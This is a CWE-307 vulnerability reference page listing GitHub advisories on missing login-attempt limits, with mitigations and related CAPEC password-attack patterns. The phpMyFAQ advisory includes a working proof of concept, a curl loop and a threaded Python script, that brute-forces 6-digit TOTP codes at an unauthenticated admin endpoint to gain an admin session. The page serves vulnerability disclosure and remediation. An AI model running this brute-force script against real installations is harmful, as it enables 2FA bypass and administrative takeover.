CWE-307
AllowedImproper Restriction of Excessive Authentication Attempts
Abstraction: Base · Status: Draft
The product does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame.
905 vulnerabilities reference this CWE, most recent first.
GHSA-9MJF-QQ2P-8JR2
Vulnerability from github – Published: 2026-03-06 18:31 – Updated: 2026-03-06 18:31The WebSocket Application Programming Interface lacks restrictions on the number of authentication requests. This absence of rate limiting may allow an attacker to conduct denial-of-service attacks by suppressing or mis-routing legitimate charger telemetry, or conduct brute-force attacks to gain unauthorized access.
{
"affected": [],
"aliases": [
"CVE-2026-20882"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-06T16:16:09Z",
"severity": "HIGH"
},
"details": "The WebSocket Application Programming Interface lacks restrictions on the number of authentication requests. This absence of rate limiting may allow an attacker to conduct denial-of-service attacks by suppressing or mis-routing legitimate charger telemetry, or conduct brute-force attacks to gain unauthorized access.",
"id": "GHSA-9mjf-qq2p-8jr2",
"modified": "2026-03-06T18:31:13Z",
"published": "2026-03-06T18:31:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20882"
},
{
"type": "WEB",
"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-062-06.json"
},
{
"type": "WEB",
"url": "https://mobiliti.hu/emobilitas/ugyfeltamogatas/ugyfelszolgalat"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-06"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-9MJJ-M5VM-P4JH
Vulnerability from github – Published: 2025-09-22 18:30 – Updated: 2025-09-22 18:30Airship AI Acropolis allows unlimited MFA attempts for 15 minutes after a user has logged in with valid credentials. A remote attacker with valid credentials could brute-force the 6-digit MFA code. Fixed in 10.2.35, 11.0.21, and 11.1.9.
{
"affected": [],
"aliases": [
"CVE-2025-35041"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-22T16:15:42Z",
"severity": "HIGH"
},
"details": "Airship AI Acropolis allows unlimited MFA attempts for 15 minutes after a user has logged in with valid credentials. A remote attacker with valid credentials could brute-force the 6-digit MFA code. Fixed in 10.2.35, 11.0.21, and 11.1.9.",
"id": "GHSA-9mjj-m5vm-p4jh",
"modified": "2025-09-22T18:30:36Z",
"published": "2025-09-22T18:30:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-35041"
},
{
"type": "WEB",
"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-265-01.json"
},
{
"type": "WEB",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-35041"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-9PGC-3HV6-JCH2
Vulnerability from github – Published: 2022-05-24 16:57 – Updated: 2024-04-04 02:09bl-kernel/security.class.php in Bludit 3.9.2 allows attackers to bypass a brute-force protection mechanism by using many different forged X-Forwarded-For or Client-IP HTTP headers.
{
"affected": [],
"aliases": [
"CVE-2019-17240"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-10-06T19:15:00Z",
"severity": "CRITICAL"
},
"details": "bl-kernel/security.class.php in Bludit 3.9.2 allows attackers to bypass a brute-force protection mechanism by using many different forged X-Forwarded-For or Client-IP HTTP headers.",
"id": "GHSA-9pgc-3hv6-jch2",
"modified": "2024-04-04T02:09:11Z",
"published": "2022-05-24T16:57:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17240"
},
{
"type": "WEB",
"url": "https://github.com/bludit/bludit/pull/1090"
},
{
"type": "WEB",
"url": "https://rastating.github.io/bludit-brute-force-mitigation-bypass"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/158875/Bludit-3.9.2-Authentication-Bruteforce-Mitigation-Bypass.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/159664/Bludit-3.9.2-Bruteforce-Mitigation-Bypass.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9PQ7-MFWH-XX2J
Vulnerability from github – Published: 2026-05-06 20:42 – Updated: 2026-06-09 00:00Summary
The /admin/check endpoint in AuthenticationController implements SkipsAuthenticationCheck, making it reachable without any prior authentication. An anonymous attacker (Bob) can POST arbitrary user-id and token values to brute-force any user's 6-digit TOTP code. No rate limiting exists. The 10^6 keyspace is exhaustible in minutes. Reachability confirmed against a default install: unauthenticated POST /admin/check with a user-id body field returns HTTP 302 to /admin/token?user-id=<value>, echoing the attacker-supplied user id without any binding to a prior password-phase authentication.
Details
File: phpmyfaq/src/phpMyFAQ/Controller/Administration/AuthenticationController.php, lines 35-36 and 201-228.
The controller class declaration:
final class AuthenticationController extends AbstractAdministrationController implements SkipsAuthenticationCheck
The SkipsAuthenticationCheck interface (phpmyfaq/src/phpMyFAQ/Controller/Administration/SkipsAuthenticationCheck.php) is a marker interface that tells the ControllerContainerListener to skip authentication enforcement. Every route in this controller is reachable without a session.
The check action (line 201-228):
#[Route(path: '/check', name: 'admin.auth.check', methods: ['POST'])]
public function check(Request $request): RedirectResponse
{
if ($this->currentUser->isLoggedIn()) {
return new RedirectResponse(url: './');
}
$token = Filter::filterVar($request->request->get(key: 'token'), FILTER_SANITIZE_SPECIAL_CHARS);
$userId = (int) Filter::filterVar($request->request->get(key: 'user-id'), FILTER_VALIDATE_INT);
$user = $this->currentUserService;
$user->getUserById($userId);
if (strlen((string) $token) === 6) {
$tfa = $this->twoFactor;
$result = $tfa->validateToken($token, $userId);
if ($result) {
$user->twoFactorSuccess();
$this->adminLog->log($user, AdminLogType::AUTH_2FA_SUCCESS->value . ':' . $user->getLogin());
return new RedirectResponse(url: './');
}
$this->adminLog->log($user, AdminLogType::AUTH_2FA_FAILED->value . ':' . $user->getLogin());
}
return new RedirectResponse('./token?user-id=' . $userId);
}
Problems:
- No session binding: The endpoint accepts
user-idfrom the POST body. It does not verify that the caller previously authenticated with a password for that user. - No rate limit or lockout: Failed attempts redirect back to the token form with no counter, delay, or account lock.
- Unauthenticated access: The
SkipsAuthenticationCheckmarker exempts the entire controller from auth enforcement.
The normal login flow (/admin/authenticate) redirects to /admin/token?user-id=X after a valid password. But nothing prevents Bob from skipping the password step and hitting /admin/check directly.
Proof of Concept
# Step 1: Identify target user ID (admin is typically user_id=1)
TARGET_HOST="http://target.example"
USER_ID=1
# Step 2: Brute-force the 6-digit TOTP code
# TOTP codes rotate every 30 seconds, giving a window of ~1M attempts per window.
# At 200 req/s this takes under 2 hours worst case; with 2 valid windows it halves.
for code in $(seq -w 000000 999999); do
RESPONSE=$(curl -s -o /dev/null -w "%{http_code}:%{redirect_url}" \
-X POST "${TARGET_HOST}/admin/check" \
-d "token=${code}&user-id=${USER_ID}")
# A successful 2FA grants a session and redirects to ./
# A failure redirects to ./token?user-id=1
if echo "$RESPONSE" | grep -qv "token?user-id="; then
echo "[+] Valid TOTP: ${code}"
break
fi
done
# Faster parallel version
import requests
from concurrent.futures import ThreadPoolExecutor
TARGET = "http://target.example/admin/check"
USER_ID = 1
def try_code(code):
r = requests.post(TARGET, data={"token": f"{code:06d}", "user-id": USER_ID}, allow_redirects=False)
location = r.headers.get("Location", "")
if "token?user-id=" not in location:
return code
return None
with ThreadPoolExecutor(max_workers=50) as pool:
for result in pool.map(try_code, range(1000000)):
if result is not None:
print(f"[+] Valid TOTP: {result:06d}")
break
Impact
Bob bypasses two-factor authentication for any user account (including administrators) without knowing the user's password. After a successful brute-force, twoFactorSuccess() grants a fully authenticated admin session. Bob gains full administrative control: user management, FAQ content modification, configuration changes, and access to backup/export functions containing all data.
CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (High, 9.1)
CWE: CWE-307 (Improper Restriction of Excessive Authentication Attempts)
Recommended Fix
-
Bind the 2FA step to a password-verified session: Store a flag in the server-side session during
authenticate()indicating the user passed password auth. Thecheckaction must verify this flag before accepting TOTP attempts. -
Add rate limiting / lockout: After 5 failed TOTP attempts, lock the account or enforce an exponential backoff.
-
Narrow the SkipsAuthenticationCheck scope: Move the
/checkand/tokenroutes into a separate controller that requires the password-verified session flag rather than blanket-skipping auth.
Example session-binding fix in check():
#[Route(path: '/check', name: 'admin.auth.check', methods: ['POST'])]
public function check(Request $request): RedirectResponse
{
$userId = (int) Filter::filterVar($request->request->get(key: 'user-id'), FILTER_VALIDATE_INT);
// Require that the session proves password auth for this specific user
if ($this->session->get('2fa_pending_user_id') !== $userId) {
return new RedirectResponse(url: './login');
}
// ... existing TOTP validation ...
}
And in authenticate(), after successful password check:
$this->session->set('2fa_pending_user_id', $this->currentUser->getUserId());
Found by aisafe.io
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.1.1"
},
"package": {
"ecosystem": "Packagist",
"name": "thorsten/phpmyfaq"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.1.1"
},
"package": {
"ecosystem": "Packagist",
"name": "phpmyfaq/phpmyfaq"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45010"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T20:42:54Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "## Summary\n\nThe `/admin/check` endpoint in `AuthenticationController` implements `SkipsAuthenticationCheck`, making it reachable without any prior authentication. An anonymous attacker (Bob) can POST arbitrary `user-id` and `token` values to brute-force any user\u0027s 6-digit TOTP code. No rate limiting exists. The 10^6 keyspace is exhaustible in minutes. Reachability confirmed against a default install: unauthenticated `POST /admin/check` with a `user-id` body field returns HTTP 302 to `/admin/token?user-id=\u003cvalue\u003e`, echoing the attacker-supplied user id without any binding to a prior password-phase authentication.\n\n## Details\n\n**File**: `phpmyfaq/src/phpMyFAQ/Controller/Administration/AuthenticationController.php`, lines 35-36 and 201-228.\n\nThe controller class declaration:\n\n```php\nfinal class AuthenticationController extends AbstractAdministrationController implements SkipsAuthenticationCheck\n```\n\nThe `SkipsAuthenticationCheck` interface (`phpmyfaq/src/phpMyFAQ/Controller/Administration/SkipsAuthenticationCheck.php`) is a marker interface that tells the `ControllerContainerListener` to skip authentication enforcement. Every route in this controller is reachable without a session.\n\nThe `check` action (line 201-228):\n\n```php\n#[Route(path: \u0027/check\u0027, name: \u0027admin.auth.check\u0027, methods: [\u0027POST\u0027])]\npublic function check(Request $request): RedirectResponse\n{\n if ($this-\u003ecurrentUser-\u003eisLoggedIn()) {\n return new RedirectResponse(url: \u0027./\u0027);\n }\n\n $token = Filter::filterVar($request-\u003erequest-\u003eget(key: \u0027token\u0027), FILTER_SANITIZE_SPECIAL_CHARS);\n $userId = (int) Filter::filterVar($request-\u003erequest-\u003eget(key: \u0027user-id\u0027), FILTER_VALIDATE_INT);\n\n $user = $this-\u003ecurrentUserService;\n $user-\u003egetUserById($userId);\n\n if (strlen((string) $token) === 6) {\n $tfa = $this-\u003etwoFactor;\n $result = $tfa-\u003evalidateToken($token, $userId);\n\n if ($result) {\n $user-\u003etwoFactorSuccess();\n $this-\u003eadminLog-\u003elog($user, AdminLogType::AUTH_2FA_SUCCESS-\u003evalue . \u0027:\u0027 . $user-\u003egetLogin());\n return new RedirectResponse(url: \u0027./\u0027);\n }\n\n $this-\u003eadminLog-\u003elog($user, AdminLogType::AUTH_2FA_FAILED-\u003evalue . \u0027:\u0027 . $user-\u003egetLogin());\n }\n\n return new RedirectResponse(\u0027./token?user-id=\u0027 . $userId);\n}\n```\n\nProblems:\n\n1. **No session binding**: The endpoint accepts `user-id` from the POST body. It does not verify that the caller previously authenticated with a password for that user.\n2. **No rate limit or lockout**: Failed attempts redirect back to the token form with no counter, delay, or account lock.\n3. **Unauthenticated access**: The `SkipsAuthenticationCheck` marker exempts the entire controller from auth enforcement.\n\nThe normal login flow (`/admin/authenticate`) redirects to `/admin/token?user-id=X` after a valid password. But nothing prevents Bob from skipping the password step and hitting `/admin/check` directly.\n\n## Proof of Concept\n\n```bash\n# Step 1: Identify target user ID (admin is typically user_id=1)\nTARGET_HOST=\"http://target.example\"\nUSER_ID=1\n\n# Step 2: Brute-force the 6-digit TOTP code\n# TOTP codes rotate every 30 seconds, giving a window of ~1M attempts per window.\n# At 200 req/s this takes under 2 hours worst case; with 2 valid windows it halves.\n\nfor code in $(seq -w 000000 999999); do\n RESPONSE=$(curl -s -o /dev/null -w \"%{http_code}:%{redirect_url}\" \\\n -X POST \"${TARGET_HOST}/admin/check\" \\\n -d \"token=${code}\u0026user-id=${USER_ID}\")\n\n # A successful 2FA grants a session and redirects to ./\n # A failure redirects to ./token?user-id=1\n if echo \"$RESPONSE\" | grep -qv \"token?user-id=\"; then\n echo \"[+] Valid TOTP: ${code}\"\n break\n fi\ndone\n```\n\n```python\n# Faster parallel version\nimport requests\nfrom concurrent.futures import ThreadPoolExecutor\n\nTARGET = \"http://target.example/admin/check\"\nUSER_ID = 1\n\ndef try_code(code):\n r = requests.post(TARGET, data={\"token\": f\"{code:06d}\", \"user-id\": USER_ID}, allow_redirects=False)\n location = r.headers.get(\"Location\", \"\")\n if \"token?user-id=\" not in location:\n return code\n return None\n\nwith ThreadPoolExecutor(max_workers=50) as pool:\n for result in pool.map(try_code, range(1000000)):\n if result is not None:\n print(f\"[+] Valid TOTP: {result:06d}\")\n break\n```\n\n## Impact\n\nBob bypasses two-factor authentication for any user account (including administrators) without knowing the user\u0027s password. After a successful brute-force, `twoFactorSuccess()` grants a fully authenticated admin session. Bob gains full administrative control: user management, FAQ content modification, configuration changes, and access to backup/export functions containing all data.\n\n**CVSS 3.1**: `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N` (High, 9.1)\n**CWE**: CWE-307 (Improper Restriction of Excessive Authentication Attempts)\n\n## Recommended Fix\n\n1. **Bind the 2FA step to a password-verified session**: Store a flag in the server-side session during `authenticate()` indicating the user passed password auth. The `check` action must verify this flag before accepting TOTP attempts.\n\n2. **Add rate limiting / lockout**: After 5 failed TOTP attempts, lock the account or enforce an exponential backoff.\n\n3. **Narrow the SkipsAuthenticationCheck scope**: Move the `/check` and `/token` routes into a separate controller that requires the password-verified session flag rather than blanket-skipping auth.\n\nExample session-binding fix in `check()`:\n\n```php\n#[Route(path: \u0027/check\u0027, name: \u0027admin.auth.check\u0027, methods: [\u0027POST\u0027])]\npublic function check(Request $request): RedirectResponse\n{\n $userId = (int) Filter::filterVar($request-\u003erequest-\u003eget(key: \u0027user-id\u0027), FILTER_VALIDATE_INT);\n\n // Require that the session proves password auth for this specific user\n if ($this-\u003esession-\u003eget(\u00272fa_pending_user_id\u0027) !== $userId) {\n return new RedirectResponse(url: \u0027./login\u0027);\n }\n\n // ... existing TOTP validation ...\n}\n```\n\nAnd in `authenticate()`, after successful password check:\n\n```php\n$this-\u003esession-\u003eset(\u00272fa_pending_user_id\u0027, $this-\u003ecurrentUser-\u003egetUserId());\n```\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
"id": "GHSA-9pq7-mfwh-xx2j",
"modified": "2026-06-09T00:00:16Z",
"published": "2026-05-06T20:42:54Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9pq7-mfwh-xx2j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45010"
},
{
"type": "PACKAGE",
"url": "https://github.com/thorsten/phpMyFAQ"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/phpmyfaq-unauthenticated-two-factor-authentication-brute-force-via-admin-check-endpoint"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "phpMyFAQ enables unauthenticated 2FA brute-force attack via /admin/check acceptance of arbitrary user-id"
}
GHSA-9PXP-CVW2-VJGF
Vulnerability from github – Published: 2025-09-19 00:30 – Updated: 2025-09-19 00:30Cognex In-Sight Explorer and In-Sight Camera Firmware expose a telnet-based service on port 23 in order to allow management operations on the device such as firmware upgrades and device reboot requiring an authentication. A wrong management of login failures of the service allows a denial-of-service attack, leaving the telnet service into an unreachable state.
{
"affected": [],
"aliases": [
"CVE-2025-54860"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-18T22:15:46Z",
"severity": "MODERATE"
},
"details": "Cognex In-Sight Explorer and In-Sight Camera Firmware expose a telnet-based service on port 23 in order to allow \nmanagement operations on the device such as firmware upgrades and device\n reboot requiring an authentication. A wrong management of login \nfailures of the service allows a denial-of-service attack, leaving the telnet service \ninto an unreachable state.",
"id": "GHSA-9pxp-cvw2-vjgf",
"modified": "2025-09-19T00:30:58Z",
"published": "2025-09-19T00:30:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54860"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-261-06"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-9QF7-Q6GX-Q652
Vulnerability from github – Published: 2026-03-05 18:31 – Updated: 2026-03-25 18:31Authentication Bypass by Capture-replay, Use of Password Hash With Insufficient Computational Effort vulnerability in rustdesk-client RustDesk Client rustdesk-client on Windows, MacOS, Linux, iOS, Android (Client login, peer authentication modules) allows Reusing Session IDs (aka Session Replay). This vulnerability is associated with program files src/client.Rs and program routines hash_password(), login proof construction.
This issue affects RustDesk Client: through 1.4.5.
{
"affected": [],
"aliases": [
"CVE-2026-30789"
],
"database_specific": {
"cwe_ids": [
"CWE-294",
"CWE-307",
"CWE-916"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-05T16:16:19Z",
"severity": "CRITICAL"
},
"details": "Authentication Bypass by Capture-replay, Use of Password Hash With Insufficient Computational Effort vulnerability in rustdesk-client RustDesk Client rustdesk-client on Windows, MacOS, Linux, iOS, Android (Client login, peer authentication modules) allows Reusing Session IDs (aka Session Replay). This vulnerability is associated with program files src/client.Rs and program routines hash_password(), login proof construction.\n\nThis issue affects RustDesk Client: through 1.4.5.",
"id": "GHSA-9qf7-q6gx-q652",
"modified": "2026-03-25T18:31:36Z",
"published": "2026-03-05T18:31:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30789"
},
{
"type": "WEB",
"url": "https://docs.google.com/document/d/e/2PACX-1vSds6jjpd38oO_yIAyd1HYtKNUuea-I-ozAPpGhYI7QgAU-QGJ7D8a4rOZVj1vmiUXV1EcdRHf9aZAW/pub"
},
{
"type": "WEB",
"url": "https://rustdesk.com/docs/en/client"
},
{
"type": "WEB",
"url": "https://www.vulsec.org"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-9QMR-4GV6-XMF3
Vulnerability from github – Published: 2025-04-03 00:31 – Updated: 2025-04-15 15:30Improper Restriction of Excessive Authentication Attempts vulnerability in Drupal Access code allows Brute Force.This issue affects Access code: from 0.0.0 before 2.0.4.
{
"affected": [],
"aliases": [
"CVE-2025-3129"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-02T22:15:21Z",
"severity": "MODERATE"
},
"details": "Improper Restriction of Excessive Authentication Attempts vulnerability in Drupal Access code allows Brute Force.This issue affects Access code: from 0.0.0 before 2.0.4.",
"id": "GHSA-9qmr-4gv6-xmf3",
"modified": "2025-04-15T15:30:52Z",
"published": "2025-04-03T00:31:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3129"
},
{
"type": "WEB",
"url": "https://www.drupal.org/sa-contrib-2025-028"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-9QQ6-6QWX-6WRM
Vulnerability from github – Published: 2022-04-30 18:17 – Updated: 2024-02-09 03:32The telnet server for 3Com hardware such as PS40 SuperStack II does not delay or disconnect remote attackers who provide an incorrect username or password, which makes it easier to break into the server via brute force password guessing.
{
"affected": [],
"aliases": [
"CVE-2001-1291"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2001-07-12T04:00:00Z",
"severity": "HIGH"
},
"details": "The telnet server for 3Com hardware such as PS40 SuperStack II does not delay or disconnect remote attackers who provide an incorrect username or password, which makes it easier to break into the server via brute force password guessing.",
"id": "GHSA-9qq6-6qwx-6wrm",
"modified": "2024-02-09T03:32:51Z",
"published": "2022-04-30T18:17:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2001-1291"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/6855"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/archive/1/196957"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/3034"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9V87-664X-72QC
Vulnerability from github – Published: 2022-05-24 19:09 – Updated: 2022-05-24 19:09An issue was discovered in LemonLDAP::NG before 2.0.12. Session cache corruption can lead to authorization bypass or spoofing. By running a loop that makes many authentication attempts, an attacker might alternately be authenticated as one of two different users.
{
"affected": [],
"aliases": [
"CVE-2021-35472"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-07-30T14:15:00Z",
"severity": "HIGH"
},
"details": "An issue was discovered in LemonLDAP::NG before 2.0.12. Session cache corruption can lead to authorization bypass or spoofing. By running a loop that makes many authentication attempts, an attacker might alternately be authenticated as one of two different users.",
"id": "GHSA-9v87-664x-72qc",
"modified": "2022-05-24T19:09:22Z",
"published": "2022-05-24T19:09:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-35472"
},
{
"type": "WEB",
"url": "https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/commit/8d3b763b6af2b8a9c4ad2765fbfabffec8a73af5"
},
{
"type": "WEB",
"url": "https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2539"
},
{
"type": "WEB",
"url": "https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/tags"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2021/dsa-4943"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-9W2M-C6WC-48Q6
Vulnerability from github – Published: 2023-12-08 15:30 – Updated: 2023-12-11 21:30DoraCMS v2.1.8 was discovered to re-use the same code for verification of valid usernames and passwords. This vulnerability allows attackers to gain access to the application via a bruteforce attack.
{
"affected": [],
"aliases": [
"CVE-2023-49443"
],
"database_specific": {
"cwe_ids": [
"CWE-307"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-12-08T15:15:07Z",
"severity": "CRITICAL"
},
"details": "DoraCMS v2.1.8 was discovered to re-use the same code for verification of valid usernames and passwords. This vulnerability allows attackers to gain access to the application via a bruteforce attack.",
"id": "GHSA-9w2m-c6wc-48q6",
"modified": "2023-12-11T21:30:21Z",
"published": "2023-12-08T15:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49443"
},
{
"type": "WEB",
"url": "https://github.com/woshinibaba222/DoraCMS-Verification-Code-Reuse"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
- Common protection mechanisms include:
- Disconnecting the user after a small number of failed attempts
- Implementing a timeout
- Locking out a targeted account
- Requiring a computational task on the user's part.
Mitigation MIT-4
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
- Consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator. [REF-45]
CAPEC-16: Dictionary-based Password Attack
An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.
Dictionary Attacks differ from similar attacks such as Password Spraying (CAPEC-565) and Credential Stuffing (CAPEC-600), since they leverage unknown username/password combinations and don't care about inducing account lockouts.
CAPEC-49: Password Brute Forcing
An adversary tries every possible value for a password until they succeed. A brute force attack, if feasible computationally, will always be successful because it will essentially go through all possible passwords given the alphabet used (lower case letters, upper case letters, numbers, symbols, etc.) and the maximum length of the password.
CAPEC-560: Use of Known Domain Credentials
An adversary guesses or obtains (i.e. steals or purchases) legitimate credentials (e.g. userID/password) to achieve authentication and to perform authorized actions under the guise of an authenticated user or service.
CAPEC-565: Password Spraying
In a Password Spraying attack, an adversary tries a small list (e.g. 3-5) of common or expected passwords, often matching the target's complexity policy, against a known list of user accounts to gain valid credentials. The adversary tries a particular password for each user account, before moving onto the next password in the list. This approach assists the adversary in remaining undetected by avoiding rapid or frequent account lockouts. The adversary may then reattempt the process with additional passwords, once enough time has passed to prevent inducing a lockout.
CAPEC-600: Credential Stuffing
An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.
CAPEC-652: Use of Known Kerberos Credentials
An adversary obtains (i.e. steals or purchases) legitimate Kerberos credentials (e.g. Kerberos service account userID/password or Kerberos Tickets) with the goal of achieving authenticated access to additional systems, applications, or services within the domain.
CAPEC-653: Use of Known Operating System Credentials
An adversary guesses or obtains (i.e. steals or purchases) legitimate operating system credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the system, under the guise of an authenticated user or service. This applies to any Operating System.